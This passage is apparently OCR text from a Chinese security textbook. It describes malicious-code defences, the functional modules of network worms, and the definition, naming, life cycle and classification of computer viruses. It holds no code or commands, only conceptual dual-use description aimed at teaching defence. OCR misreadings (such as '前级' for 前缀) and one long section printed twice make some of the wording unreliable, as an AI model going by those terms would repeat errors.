第 一 种 方法 是 在 恶意 代码 检测 软件 中 设置 校 验 和 法 。 对 检测 的 对 象 文件 计算 其 正常 状 
态 的 校 验 和 并 将 其 写 人 被 查 文件 中 或 检测 工具 中 ,然后 进行 比较 。 

第 二 种 方法 是 在 应 用 程序 中 嵌入 校 验 和 法 。 将 文件 正常 状态 的 校 验 和 写 入 文件 本 身 
中 ,每 当 应 用 程序 启动 时 ,比较 现行 校 验 和 与 原始 校 验 和 ,实现 应 用 程序 的 自我 检测 功能 。 

第 三 种 方法 是 将 校 验 和 程序 常 驻 内 存 。 每 当 应 用 程序 开始 运行 时 ,自动 比较 检查 应 用 
程序 内 部 或 别 的 文件 中 预 留 保存 的 校 验 和 。 

校 验 和 可 以 检测 未 知 恶 意 代码 对 文件 的 修改 ,但 也 有 两 个 缺点 : 一 是 校 验 和 法 实际 上 
不 能 检测 文件 是 否 被 恶意 代码 感染 , 它 只 是 查找 变化 ,即使 发 现 恶 意 代 码 造成 了 文件 的 改 
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变 , 校 验 和 法 也 无 法 将 恶意 代码 消除 ,也 不 能 判断 究竟 被 哪 种 恶意 代码 感染 ; 恶意 代码 
可 以 采用 多 种 手段 欺骗 校 验 和 法 ,使 之 认为 文件 没有 改变 。 
3) 沙 箱 技 术 


沙 箱 技术 指 根据 系统 中 每 一 个 可 执行 程序 的 访问 资源 .以 及 系统 赋予 的 权限 建立 应 用 
程序 的 “ 沙 箱 ”, 限 制 恶意 代码 的 运行 。 每 个 应 用 程序 都 运行 在 自己 的 且 受 保护 的 “ 沙 箱 ” 之 
中 ,不 能 影响 其 他 程序 的 运行 。 同 样 ,这 些 程序 的 运行 也 不 能 影响 操作 系统 的 正常 运行 , 操 
作 系 统 与 驱动 程序 也 存活 在 自己 的 “ 沙 箱 ” 之 中 。 美 国 加 州 大 学 Berkeley 实验 室 开发 了 基 
于 Solaris 操作 系统 的 沙 箱 系 统 , 应 用 程序 经 过 系统 底层 调用 解释 执行 ,系统 自动 判断 应 用 
程序 调用 的 底层 函数 是 否 符合 系统 的 安全 要 求 , 并 决定 是 否 执 行 。 

对 于 每 个 应 用 程序 , 沙 箱 都 为 其 准备 了 一 个 配置 文件 ,限制 该 文件 能 够 访问 的 资源 与 系 
统 赋予 的 权限 。Windows XP/2003/2008 操作 系统 提供 了 一 种 软件 限制 策略 ,隔离 具有 潜 
在 危害 的 代码 。 这 种 隔离 技术 其 实 也 是 一 种 沙 箱 技术 ,可 以 保护 系统 免 受 通过 电子 邮件 和 
Internet 传染 的 各 种 恶意 代码 的 侵害 。 这 些 策略 允许 选择 系统 管理 应 用 程序 的 方式 : 应 用 
程序 既 可 以 被 “限制 运行 ”, 也 可 以 被 “禁止 运行 "。 通 过 在 “ 沙 箱 ” 中 执行 不 受信 任 的 代码 与 
脚本 ,系统 可 以 限制 甚至 防止 恶意 代码 对 系统 完整 性 的 破坏 。 

4) 安全 操作 系统 对 恶意 代码 的 防范 

恶意 代码 成 功 入 侵 的 重要 一 环 是 获得 系统 的 控制 权 , 使 操作 系统 为 它 分 配 系统 资源 。 
无 论 哪 种 恶意 代码 ,无 论 要 达到 何 种 恶意 目的 ,都 必须 具有 相应 的 权限 。 没 有 足够 的 权限 ， 
恶意 代码 不 可 能 实现 其 预定 的 恶意 目标 ,或 者 仅 能 够 实现 其 部 分 恶意 目标 。 

2. 基于 网 络 的 恶意 代码 防范 方法 


由 于 恶意 代码 具有 相当 的 复杂 性 和 行为 不 确定 性 ,恶意 代码 的 防范 需要 多 种 技术 综合 
应 用 ,包括 恶意 代码 监测 与 预警 .恶意 代码 传播 抑制 .恶意 代码 漏洞 自动 修复 .恶意 代码 阻 断 
等 。 基 于 网 络 的 恶意 代码 防范 方法 包括 恶意 代码 检测 防御 和 恶意 代码 预警 。 

其 中 常见 的 恶意 代码 检测 防御 包括 基于 GrIDS 的 恶意 代码 检测 基于 PLD 硬件 的 检 
测 防御 、 基 于 HoneyPot 的 检测 防御 和 基于 CCDC 的 检测 防御 。 

(1) 基于 GrIDS 的 恶意 代码 检测 。 著 名 的 GrIDS 主要 是 针对 大 规模 网 络 攻击 和 自动 
化 入 侵 设 计 的 , 它 收 集 计 算 机 和 网 络 活动 的 数据 以 及 它们 之 间 的 连接 ,在 预先 定义 的 模式 库 
的 驱动 下 ,将 这 些 数据 构建 成 网 络 活动 行为 来 表征 网 络 活动 结构 上 的 因果 关系 。 它 通过 建 
立 和 分 析 节 点 间 的 行为 图 (Activity Graph) ,通过 与 预定 义 的 行为 模式 图 进行 匹配 ,检测 恶 
意 代 码 是 否 存在 。 该 工具 是 当前 检测 分 布 式 恶意 代码 和 人 侵 比 较 有 效 的 工具 。 

(2) 基于 PLD 硬件 的 检测 防御 。 华 盛 顿 大 学 应 用 研究 室 的 John W. Lockwood James 
Moscolal 和 MatthewKulig 等 提出 了 一 种 采用 可 编程 逻辑 设备 (Programmable Logic 
Device, PLD) 对 抗 恶 意 代码 的 防范 系统 。 该 系统 由 3 个 相互 内 联 部 件 [数据 控制 设备 (Data 
Enabling Device,DED) ,内 容 匹 配 服 务 (Content Matching Server,CMS) 和 区 域 事务 处 理 器 
(Regional Transaction Processor, RTP) ] 组 成 。 

DED 负责 捕获 流 经 网 络 出 入口 的 所 有 数据 包 ,根据 CMS 提供 的 特征 串 或 规则 表达 式 对 
数据 包 进 行 扫描 匹配 并 把 结果 传递 给 RTP; CMS 负责 从 后 台 的 MYSQL 数据 库 中 读 取 已 经 
存在 的 恶意 代码 特征 ,编译 综合 成 DED 设备 可 以 利用 的 特征 串 或 规则 表达 式 ; RTP 根据 匹配 
结果 决定 DED 采取 何 种 操作 。 恶 意 代 码 大 规模 入 侵 时 ,系统 管理 员 首 先 把 该 恶意 代码 的 特征 
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添加 到 CMS 的 特征 数据 库 中 ,DED 扫描 到 相应 特征 才 会 请 求 RTP 做 出 放行 或 阻 断 等 响应 。 

(3) 基于 HoneyPot 的 检测 防御 。 早 期 HoneyPot 主要 用 于 防范 网 络 黑客 攻击 。 
ReVirt 是 能 够 检测 网 络 攻击 或 网 络 异常 行为 的 HoneyPot 系统 。Spitzner 首次 运用 
HoneyPot 防御 恶意 代码 攻击 。HoneyPot 之 间 可 以 相互 共享 捕获 的 数据 信息 ,采用 NIDS 
的 规则 生成 器 产生 恶意 代码 的 匹配 规则 , 当 恶 意 代码 根据 一 定 的 扫描 策略 扫描 存在 漏洞 主 
机 的 地 址 空间 时 ,HoneyPots 可 以 捕获 恶意 代码 扫描 攻击 的 数据 ,然后 采用 特征 匹配 来 判断 
是 否 有 恶意 代码 攻击 。 

(4) 基于 CCDC 的 检测 防御 。 由 于 主动 式 传播 恶意 代码 具有 生物 病毒 特征 ,美国 安全 
专家 提议 建立 病毒 控制 中 心 (The Cyber Centers for Disease Control,CCDC) 来 对 抗 恶 意 代 
码 攻击 。 防 范 恶意 代码 的 CCDC 体系 实现 以 下 功能 : 鉴别 恶意 代码 的 爆发 期 ; 恶意 代码 样 
本 特征 分 析 ; 恶意 代码 传染 对 抗 ; 恶意 代码 新 的 传染 途径 预测 ; 前 摄 性 恶意 代码 对 抗 工具 
研究 ; 对 抗 未 来 恶意 代码 的 威胁 。 

CCDC 能 够 实现 对 大 规模 恶意 代码 和 人 侵 的 预警 .防御 和 阻 断 。 但 CCDC 也 存在 一 些 问 
题 : CCDC 是 一 个 规模 庞大 的 防范 体系 ,要 考虑 体系 运转 的 代价 ; 由 于 CCDC 体系 的 开放 
性 ,CCDC 自身 的 安全 问题 不 容 忽 视 ; 在 CCDC 防范 体系 中 ,攻击 者 能 够 监测 恶意 代码 攻击 
的 全 过 程 ,深入 理解 CCDC 防范 恶意 代码 的 工作 机 制 ,因此 可 能 导致 突破 CCDC 防范 体系 
的 恶意 代码 出 现 。 


7.1.4 ”网络 蠕虫 


网 络 蠕虫 是 一 种 智能 化 、 自 动 化 的 计算 机 程序 ,综合 了 网 络 攻击 、 密 码 学 和 计算 机 病毒 
等 技术 ,是 一 种 无 须 计算 机 使 用 者 干预 即 可 运行 的 攻击 程序 或 代码 , 它 会 扫描 和 攻击 网 络 上 
存在 系统 漏洞 的 节点 主机 ,通过 局 域 网 或 者 互联 网 从 一 个 节点 传播 到 另外 一 个 节点 。 

蠕虫 具有 主动 攻击 行踪 隐蔽 .利用 漏洞 ,造成 网 络 拥塞 .降低 系统 性 能 .产生 安全 隐患 、 
反复 性 和 破坏 性 等 特征 ,网 络 蠕虫 无 须 计 算 机 使 用 者 干预 即 可 运行 , 它 通 过 不 停 地 获得 网 络 
中 存在 漏洞 的 计算 机 上 的 部 分 或 全 部 控制 权 来 进行 传播 。 

网 络 蠕虫 的 功能 模块 可 以 分 为 主体 功能 模块 和 辅助 功能 模块 。 实 现 了 主体 功能 模块 的 
蠕虫 能 够 完成 复制 传播 流程 ,而 包含 辅助 功能 模块 的 蠕虫 程序 则 具有 更 强 的 生存 能 力 和 破 
坏 能 力 。 网 络 蠕虫 功能 结构 如 图 7-3 所 示 。 


人 网 络 蠕虫 功能 模块 
主体 功能 模块 。 ) (、 辅助 功能 模块 。 ) 
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图 7-3 网 络 蠕虫 的 结构 
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1. 主体 功能 模块 


网 络 蠕虫 主体 功能 模块 由 4 个 模块 构成 

(1) 信息 搜集 模块 。 该 模块 决定 采用 何 种 搜索 算法 对 本 地 或 者 目标 网 络 进行 信息 搜 
集 , 内 容 包 括 本 机 系统 信息 、 用 户 信息 、 邮 件 列 表 、 对 本 机 的 信任 或 授权 的 主机 、 本 机 所 处 网 
络 的 拓扑 结构 .边界 路 由 信息 等 等 ,这 些 信 息 可 以 单独 使 用 或 被 其 他 个 体 共 享 。 

(2) 扫描 探测 模块 。 完 成 对 特定 主机 的 脆弱 性 检测 ,决定 采用 何 种 攻击 渗透 方式 。 

(3) 攻击 渗透 模块 。 该 模块 利用 (2) 获 得 的 安全 漏洞 ,建立 传播 途径 ,该 模块 在 攻击 方 
法 上 是 开放 的 、 可 扩充 的 。 

(4) 自我 推进 模块 。 该 模块 可 以 采用 各 种 形式 生成 各 种 形态 的 蠕虫 副本 ,在 不 同 主机 
间 完 成 蠕虫 副本 传递 。 例 如 Nimda 会 生成 多 种 文件 格式 和 名 称 的 蠕虫 副本 ; W32. Nachi. 
Worm 利用 系统 程序 (例如 TFTP) 来 完成 推进 模块 的 功能 等 等 。 

2. 辅助 功能 模块 

网 络 蠕虫 辅助 功能 模块 是 对 除 主体 功能 模块 外 的 其 他 模块 的 归纳 或 预测 ,主要 由 5 个 
功能 模块 构成 : 

(1) 实体 隐藏 模块 。 包 括 对 蠕虫 各 个 实体 组 成 部 分 的 隐藏 ,变形 、 加 密 以 及 进程 的 隐 
藏 ,主要 提高 蠕虫 的 生存 能 力 。 

(2) 宿主 破坏 模块 。 该 模块 用 于 摧毁 或 破坏 被 感染 主机 ,破坏 网 络 正 常 运行 ,在 被 感染 
主机 上 留 下 后 门 等 。 

(3) 信息 通信 模块 。 该 模块 能 使 蠕虫 间 、 蠕 虫 同 黑客 之 间 能 进行 交流 ,这 是 未 来 蠕虫 发 
展 的 重点 。 利 用 通信 模块 ,蠕虫 间 可 以 共享 某 些 信息 ,使 蠕虫 的 编写 者 更 好 地 控制 蠕虫 
行为 。 

(4) 远程 控制 模块 。 控 制 模块 的 功能 是 调整 蠕虫 行为 ,控制 被 感染 主机 ,执行 蠕虫 编写 
者 下 达 的 指令 。 

(5) 自动 升级 模块 。 该 模块 可 以 使 蠕 虫 编写 者 随时 更 新 其 他 模块 的 功能 ,从 而 实现 不 
同 的 攻击 目的 。 

随 着 网 络 系统 应 用 及 复杂 性 的 增加 ,网 络 蠕虫 成 为 网 络 系统 安全 的 重要 威胁 。 在 网 络 
环境 下 ,多 样 化 的 传播 途径 和 复杂 的 应 用 环境 使 网 络 蠕虫 的 发 生 频 率 增高 、 潜 伏 性 变 强 、 覆 
盖 面 更 广 ,网 络 蠕虫 成 为 恶意 代码 研究 中 的 重 中 之 重 。 


7.2 计算 机 病毒 


7.2.1 计算 机 病毒 的 定义 


《中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 ) 第 二 十 八条 规定 : 

计算 机 病毒 是 指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 毁坏 数据 ,影响 
计算 机 使 用 ,并 能 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 。 

计算 机 病毒 同 生物 病毒 的 相似 之 处 是 能 够 侵入 计算 机 系统 和 网 络 ,危害 其 正常 工作 。 
它 能 够 通过 某 种 途径 潜伏 在 计算 机 存储 媒体 (或 程序 ) 里 , 当 达 到 某 种 条 件 时 即 被 激活 ,对 计 
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算 机 资源 进行 破坏 并 具有 自我 复制 和 传播 能 力 。 

计算 机 病毒 名 称 常 依附 在 计算 机 的 文件 中 ,如 可 执行 文件 或 Word 文档 中 。 当 文件 被 
复制 或 从 一 个 用 户 传送 到 另 一 个 用 户 时 ,它们 就 随同 文件 一 起 蔓延 开 来 。 除 了 复制 能 力 外 ， 
某 些 计算 机 病毒 还 有 其 他 一 些 共 同 特性 : 一 个 被 污染 的 程序 能 够 传送 病毒 载体 。 当 你 看 到 
病毒 载体 似乎 仅仅 表现 在 文字 和 图 像 上 时 ,它们 可 能 也 已 毁坏 了 文件 .格式 化 了 你 的 硬盘 驱 
动 或 引发 了 其 他 类 型 的 灾害 。 若 病毒 不 寄生 于 一 个 污染 程序 , 它 仍然 能 通过 占据 存储 空间 
给 你 带 来 麻烦 ,并 降低 计算 机 的 整体 性 能 。 

计算 机 病毒 命名 一 般 格 式 为 : < 病毒 前 级 >. < 病毒 名 >. < 病毒 后 级 >。 病 毒 前 级 是 指 
一 个 病毒 的 种 类 , 它 是 用 来 区 别 病毒 的 种 族 分 类 的 。 不 同 种 类 的 病毒 ,其 前 级 也 是 不 同 
的 。 例 如 常见 的 木马 病毒 的 前 级 是 Trojan, 蠕 虫 病毒 的 前 级 是 Worm 等 等 ; 病毒 名 是 
指 一 个 病毒 的 家 族 特征 ,是 用 来 区 别 和 标识 病毒 家 族 的 ,如 以 前 著名 的 CIH 病毒 的 家 族 
名 都 是 统一 的 CIH ,振荡 波 蠕虫 病毒 的 家 族 名 是 Sasser; 病毒 后 级 是 指 一 个 病毒 的 变种 
特征 ,是 用 来 区 别 某 个 具体 的 家 族 病毒 的 某 种 变种 的 ,一 般 都 采用 英文 中 的 26 个 字母 来 
表示 ,如 Worm. Sasser. b 就 是 指 振荡 波 蠕虫 病毒 的 变种 B, 因 此 一 般 称 为 振荡 波 B 变种” 
或 者 “振荡 波 变种 B"。 如 果 该 病毒 变种 非常 多 ,可 以 采用 数字 与 字母 混合 来 表示 变种 
标识 。 

只 要 掌握 病毒 的 命名 规则 ,我 们 就 能 通过 杀毒 软件 的 报告 中 出 现 的 病毒 名 来 判断 该 病 
毒 的 一 些 共 有 的 特性 。 

1. 计算 机 病毒 运行 机 制 

计算 机 病毒 通常 由 3 部 分 组 成 : 复制 传染 部 件 、 隐 藏 部 件 和 破坏 部 件 。 复 制 传染 部 件 
的 功能 是 控制 病毒 向 其 他 文件 的 传染 ; 隐藏 部 件 的 功能 是 防止 病毒 被 检测 到 ; 破坏 部 件 则 
用 在 当 病 毒 符合 激活 条 件 后 ,执行 破坏 操作 。 计 算 机 病毒 将 上 述 3 个 部 分 综合 在 一 起 ,并 将 
其 复制 到 连接 在 网 络 中 的 计算 机 后 ,病毒 就 开始 在 网 络 上 逐渐 传播 。 

计算 机 病毒 的 生命 周期 主要 有 两 个 阶段 。 

第 一 阶段 ,计算 机 病毒 的 复制 传播 阶段 。 这 一 阶段 有 可 能 持续 一 个 星期 到 几 年 。 计 算 
机 病毒 在 这 个 阶段 尽 可 能 隐藏 其 行为 ,不 干扰 系统 正常 的 功能 。 计 算 机 病毒 主动 搜寻 新 的 
主机 进行 感染 ,如 将 病毒 附 在 其 他 的 软件 程序 中 ,或 者 渗透 到 操作 系统 中 。 同 时 ,可 执行 程 
序 中 的 计算 机 病毒 获取 程序 控制 权 。 在 这 一 阶段 ,发 现 计 算 机 病毒 特别 困难 ,这 主要 是 因为 
计算 机 病毒 只 感染 少量 的 文件 ,难以 引起 用 户 警 觉 。 

第 二 阶段 ,计算 机 病毒 的 激活 阶段 。 计 算 机 病毒 在 该 阶段 开始 逐渐 地 或 突然 地 破坏 系 
统 。 计 算 机 病毒 的 主要 工作 是 根据 数学 公式 判断 激活 条 件 是 否 满足 ,用 作 计 算 机 病毒 的 激 
活 条 件 的 常 有 日 期 ,时间 ` 感 染 文件 数 或 其 他 条 件 。 

2. 计算 机 病毒 分 类 

计算 机 病毒 可 以 按 多 种 方式 进行 分 类 。 

1) 按照 计算 机 病毒 存在 的 媒体 进行 分 类 

病毒 可 以 划分 为 网 络 病毒 ,文件 病毒 .引导 型 病毒 。 网 络 病毒 通过 计算 机 网 络 传播 感染 
网 络 中 的 可 执行 文件 ; 文件 病毒 感染 计算 机 中 的 文件 (如 . com、. exe、 doc 文件 等 ); 引导 型 
病毒 感染 启动 扇 区 (Boot) 和 硬盘 的 系统 引导 扇 区 (MBR) 。 
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算 机 资源 进行 破坏 并 具有 自我 复制 和 传播 能 力 。 

计算 机 病毒 名 称 常 依附 在 计算 机 的 文件 中 ,如 可 执行 文件 或 Word 文档 中 。 当 文件 被 
复制 或 从 一 个 用 户 传送 到 另 一 个 用 户 时 ,它们 就 随同 文件 一 起 蔓延 开 来 。 除 了 复制 能 力 外 ， 
某 些 计算 机 病毒 还 有 其 他 一 些 共 同 特性 : 一 个 被 污染 的 程序 能 够 传送 病毒 载体 。 当 你 看 到 
病毒 载体 似乎 仅仅 表现 在 文字 和 图 像 上 时 ,它们 可 能 也 已 毁坏 了 文件 .格式 化 了 你 的 硬盘 驱 
动 或 引发 了 其 他 类 型 的 灾害 。 若 病毒 不 寄生 于 一 个 污染 程序 , 它 仍然 能 通过 占据 存储 空间 
给 你 带 来 麻烦 ,并 降低 计算 机 的 整体 性 能 。 

计算 机 病毒 命名 一 般 格 式 为 : < 病毒 前 级 >. < 病毒 名 >. < 病毒 后 级 >。 病 毒 前 级 是 指 
一 个 病毒 的 种 类 , 它 是 用 来 区 别 病毒 的 种 族 分 类 的 。 不 同 种 类 的 病毒 ,其 前 级 也 是 不 同 
的 。 例 如 常见 的 木马 病毒 的 前 级 是 Trojan, 蠕 虫 病毒 的 前 级 是 Worm 等 等 ; 病毒 名 是 
指 一 个 病毒 的 家 族 特征 ,是 用 来 区 别 和 标识 病毒 家 族 的 ,如 以 前 著名 的 CIH 病毒 的 家 族 
名 都 是 统一 的 CIH ,振荡 波 蠕虫 病毒 的 家 族 名 是 Sasser; 病毒 后 级 是 指 一 个 病毒 的 变种 
特征 ,是 用 来 区 别 某 个 具体 的 家 族 病毒 的 某 种 变种 的 ,一 般 都 采用 英文 中 的 26 个 字母 来 
表示 ,如 Worm. Sasser. b 就 是 指 振荡 波 蠕虫 病毒 的 变种 B, 因 此 一 般 称 为 振荡 波 B 变种” 
或 者 “振荡 波 变种 B"。 如 果 该 病毒 变种 非常 多 ,可 以 采用 数字 与 字母 混合 来 表示 变种 
标识 。 

只 要 掌握 病毒 的 命名 规则 ,我 们 就 能 通过 杀毒 软件 的 报告 中 出 现 的 病毒 名 来 判断 该 病 
毒 的 一 些 共 有 的 特性 。 

1. 计算 机 病毒 运行 机 制 

计算 机 病毒 通常 由 3 部 分 组 成 : 复制 传染 部 件 、 隐 藏 部 件 和 破坏 部 件 。 复 制 传染 部 件 
的 功能 是 控制 病毒 向 其 他 文件 的 传染 ; 隐藏 部 件 的 功能 是 防止 病毒 被 检测 到 ; 破坏 部 件 则 
用 在 当 病 毒 符合 激活 条 件 后 ,执行 破坏 操作 。 计 算 机 病毒 将 上 述 3 个 部 分 综合 在 一 起 ,并 将 
其 复制 到 连接 在 网 络 中 的 计算 机 后 ,病毒 就 开始 在 网 络 上 逐渐 传播 。 

计算 机 病毒 的 生命 周期 主要 有 两 个 阶段 。 

第 一 阶段 ,计算 机 病毒 的 复制 传播 阶段 。 这 一 阶段 有 可 能 持续 一 个 星期 到 几 年 。 计 算 
机 病毒 在 这 个 阶段 尽 可 能 隐藏 其 行为 ,不 干扰 系统 正常 的 功能 。 计 算 机 病毒 主动 搜寻 新 的 
主机 进行 感染 ,如 将 病毒 附 在 其 他 的 软件 程序 中 ,或 者 渗透 到 操作 系统 中 。 同 时 ,可 执行 程 
序 中 的 计算 机 病毒 获取 程序 控制 权 。 在 这 一 阶段 ,发 现 计 算 机 病毒 特别 困难 ,这 主要 是 因为 
计算 机 病毒 只 感染 少量 的 文件 ,难以 引起 用 户 警 觉 。 

第 二 阶段 ,计算 机 病毒 的 激活 阶段 。 计 算 机 病毒 在 该 阶段 开始 逐渐 地 或 突然 地 破坏 系 
统 。 计 算 机 病毒 的 主要 工作 是 根据 数学 公式 判断 激活 条 件 是 否 满足 ,用 作 计 算 机 病毒 的 激 
活 条 件 的 常 有 日 期 ,时间 ` 感 染 文件 数 或 其 他 条 件 。 

2. 计算 机 病毒 分 类 

计算 机 病毒 可 以 按 多 种 方式 进行 分 类 。 

1) 按照 计算 机 病毒 存在 的 媒体 进行 分 类 

病毒 可 以 划分 为 网 络 病毒 ,文件 病毒 .引导 型 病毒 。 网 络 病毒 通过 计算 机 网 络 传播 感染 
网 络 中 的 可 执行 文件 ; 文件 病毒 感染 计算 机 中 的 文件 (如 . com、. exe、 doc 文件 等 ); 引导 型 
病毒 感染 启动 扇 区 (Boot) 和 硬盘 的 系统 引导 扇 区 (MBR) 。 
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2) 按照 计算 机 病毒 传染 的 方法 进行 分 类 

根据 病毒 传染 的 方法 可 分 为 驻 留 型 病毒 和 非 驻 留 型 病毒 。 驻 留 型 病毒 感染 计算 机 后 ， 
把 自身 的 内 存 驻 留 部 分 放 在 内 存 (RAM) 中 ,这 一 部 分 程序 挂 接 系统 调用 并 合并 到 操作 系统 
中 ,并 处 于 激活 状态 ,一 直到 关机 或 重新 启动 。 非 驻 留 型 病毒 在 得 到 机 会 激活 时 并 不 感染 计 
算 机 内 存 ,一 些 病毒 在 内 存 中 留 有 小 部 分 .但 是 并 不 通过 这 一 部 分 进行 传染 ,这 类 病毒 也 被 
称 为 非 驻 留 型 病毒 。 

3) 根据 病毒 特有 的 算法 进行 分 类 

(1) 伴随 型 病毒 。 这 一 类 病毒 并 不 改变 文件 本 身 , 它 们 根据 算法 产生 . exe 文件 的 伴随 
体 , 具 有 同样 的 名 字 和 不 同 的 扩展 名 (. com) ,例如 ,xcopy. exe 的 伴随 体 是 xcopy. com。 病 
毒 把 自身 写 和 人. com 文件 并 不 改变 . exe 文件 , 当 DOS 加 载 文件 时 ,伴随 体 优先 被 执行 到 ,再 
由 伴随 体 加 载 执行 原来 的 .exe 文件。 

(2) 蠕虫 型 病毒 。 该 病毒 通过 计算 机 网 络 传播 ,不 改变 文件 和 资料 信息 ,利用 网 络 从 一 
台 机 器 的 内 存 传播 到 其 他 机 器 的 内 存 , 将 自身 的 病毒 通过 网 络 发 送出 去 。 有 时 它们 会 存在 
于 系统 中 ,一 般 除 了 占用 内 存 外 并 不 占用 其 他 资源 。 

(3) 寄生 型 病毒 。 除 了 伴随 型 和 “蠕虫 ”型 外 ,其 他 病毒 均 可 称 为 寄生 型 病毒 ,它们 依附 
在 系统 的 引导 扇 区 或 文件 中 ,通过 系统 的 功能 进行 传播 。 

(4) 诡秘 型 病毒 。 它 们 一 般 不 直接 修改 DOS 中 断 和 扇 区 数据 ,而 是 通过 设备 文件 缓冲 
区 等 DOS 内 部 修改 不 易 看 到 的 资源 ,使 用 比较 高 级 的 技术 ,利用 DOS 空闲 的 数据 区 进行 
工作 。 

(5) 变型 病毒 (又 称 幽 灵 病 毒 )。 这 一 类 病毒 使 用 一 个 复杂 的 算法 ,使 自己 每 传播 一 份 
都 具有 不 同 的 内 容 和 长 度 。 其 一 般 做 法 是 : 病毒 由 一 段 混 有 无 关 指令 的 解码 算法 和 被 变化 
过 的 病毒 体 组 成 。 

4) 按 病毒 人 侵 的 方式 分 类 

按 病 毒 人 侵 的 方式 可 以 分 为 源 代 码 嵌 入 攻击 型 病毒 .代码 取代 攻击 型 病毒 ,系统 修改 型 
病毒 和 外 过 附加 型 病毒 4 种 。 

(1) 源 代码 嵌入 攻击 型 病毒 。 源 代码 嵌入 攻击 型 病毒 就 是 指 该 病毒 人 侵 的 主要 是 高 级 
语言 的 源 程序 ,病毒 是 在 源 程 序 编 译 之 前 插入 病毒 代码 ,最 后 随 源 程序 一 起 被 编译 成 可 执行 
文件 ,这 样 刚 生成 的 文件 就 是 带 毒 文件 。 当 然 这 类 文件 是 极 少数 ,因为 这 些 病毒 开发 者 不 可 
能 轻易 得 到 那些 软件 开发 公司 编译 前 的 源 程 序 ,况且 这 类 入 侵 的 方式 难度 较 大 ,需要 病毒 开 
发 者 达到 非常 专业 的 编程 水 平 。 

(2) 代码 取代 攻击 型 病毒 。 代 码 取代 攻击 型 病毒 主要 是 由 它 自身 的 病毒 代码 取代 某 个 
入 侵 程 序 的 整个 或 部 分 模块 ,这 类 病毒 也 比较 少见 , 它 主要 是 攻击 特定 的 程序 ,针对 性 较 强 ， 
但 是 不 易 被 发 现 ,清除 起 来 也 比较 困难 。 

(3) 系统 修改 型 病毒 。 系 统 修改 型 病毒 主要 是 用 自身 程序 覆盖 或 修改 系统 中 的 某 些 文 
件 来 达到 调用 或 替代 操作 系统 中 的 部 分 功能 。 该 类 病毒 由 于 是 直接 感染 系统 ,危害 较 大 ,也 
是 最 为 多 见 的 一 种 病毒 类 型 ,多 为 文件 型 病毒 。 

(4) 外 壳 附 加 型 病毒 。 外 壳 附 加 型 病毒 通常 是 将 病毒 附加 在 正常 程序 的 头 部 或 尾部 ， 
相当 于 给 程序 添加 了 一 个 外 壳 ,在 被 感染 的 程序 执行 时 ,病毒 代码 先 被 执行 ,然后 才 将 正常 
程序 调和 内存。 目前 大 多 数 文件 型 的 病毒 属于 这 一 类 。 
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5) 按 传播 媒体 分 类 

按照 计算 机 病毒 的 传播 媒体 来 分 类 ,可 以 分 为 单机 病毒 和 网 络 病毒 两 种 。 

(1) 单机 病毒 。 单 机 病毒 的 载体 是 磁盘 或 U 盘 , 常 见 的 是 病毒 从 移动 磁盘 传人 硬盘 感 
染 系 统 ,然后 传染 其 他 移动 磁盘 ,再 传染 其 他 系统 。 

(2) 网 络 病毒 。 网 络 病毒 的 传播 媒体 不 再 是 移动 式 载体 ,而 是 网 络 通道 ,这 种 病毒 的 传 
染 能 力 更 强 ,破坏 力 更 大 。 

总 之 ,计算 机 病毒 的 分 类 方法 有 很 多 ,说 法 也 不 一 ,同一 种 病毒 可 从 不 同 角 度 进 行 分 类 。 


7.2.2 计算 机 病毒 的 特征 


计算 机 病毒 都 具有 4 个 基本 特征 。 

1. 隐蔽 性 

计算 机 病毒 的 隐蔽 性 是 指 计算 机 病毒 附加 在 正常 软件 或 文档 中 ,例如 可 执行 程序 、 
电子 邮件 、Word 文档 等 ,一 旦 用 户 未 察觉 ,病毒 就 触发 执行 ,潜入 到 受害 用 户 的 计算 机 
中 。 目 前 ,计算 机 病毒 常 利 用 电子 邮件 的 附件 作为 隐蔽 载体 ,许多 病毒 通过 邮件 进行 传 
播 , 例 如 “Melissa 病毒 ”和 * 求 职 信 ? 病 毒 。 病 毒 的 隐蔽 性 使 其 在 受害 用 户 不 知 不 觉 的 情形 
下 实施 传染 过 程 ,对 受害 计算 机 造成 系列 危害 操作 , 正 因 如 此 ,计算 机 病毒 才 得 以 扩散 
传播 。 

2. 传染 性 

计算 机 病毒 的 传染 性 是 指 计算 机 病毒 可 进行 自我 复制 ,并 把 复制 的 病毒 附加 到 无 病毒 
的 程序 中 ,或 者 去 蔡 换 磁盘 引导 区 的 记录 ,使 得 附加 了 病毒 的 程序 或 者 磁盘 变 成 了 新 的 病毒 
源 , 从 而 再 次 进行 病毒 复制 ,重复 原先 的 传染 过 程 。 计 算 机 病毒 与 其 他 程序 最 大 的 区 别 在 于 
计算 机 病毒 能 够 传染 ,而 其 他 的 程序 则 不 能 ,而 没有 传染 性 的 程序 就 不 称 为 病毒 。 生 物 病毒 
的 传播 载体 是 水 ,实物 和 空气 ,而 计算 机 病毒 的 传染 载体 是 传递 计算 机 信息 的 实体 ,病毒 通 
过 传染 载体 向 周围 的 计算 机 系统 扩散 。 目 前 ,计算 机 病毒 的 传播 载体 主要 是 磁性 媒体 .光盘 
和 计算 机 网 络 。 计 算 机 病毒 的 传播 载体 常见 于 免费 软件 .共享 软件 .电子 邮件 、 磁 盘 压 缩 程 
序 和 游戏 软件 等 。 目 前 ,计算 机 病毒 主要 通过 网 络 传播 ,病毒 的 扩散 速度 更 快 。 

3. 潜伏 性 

计算 机 病毒 感染 正常 的 计算 机 之 后 ,一 般 不 会 立即 发 作 ,而 是 等 到 触发 条 件 满足 时 , 才 
执行 病毒 的 恶意 功能 ,从 而 产生 破坏 作用 。 计 算 机 病毒 的 各 种 触发 条 件 中 最 常见 的 是 特定 
日 期 ,例如 CIH 病毒 的 发 作 时 间 是 每 年 的 4 月 26 日 。 

4. 破坏 性 

计算 机 病毒 对 系统 的 危害 程度 ,取决 于 病毒 设计 者 的 设计 意图 。 有 的 仅仅 是 恶作剧 ,有 
的 破坏 系统 数据 。 简 言 之 ,病毒 的 破坏 后 果 是 不 可 知 的 。 由 于 计算 机 病毒 是 一 段 恶意 的 程 
序 , 故 凡是 由 常规 程序 操作 使 用 的 计算 机 资源 ,计算 机 病毒 均 有 可 能 对 其 进行 破坏 。 据 统 
计 , 病 毒 发 作 后 ,造成 的 破坏 主要 有 数据 部 分 丢失 、 系 统 无 法 使 用 、 浏 览 器 配置 被 修改 、 网 络 
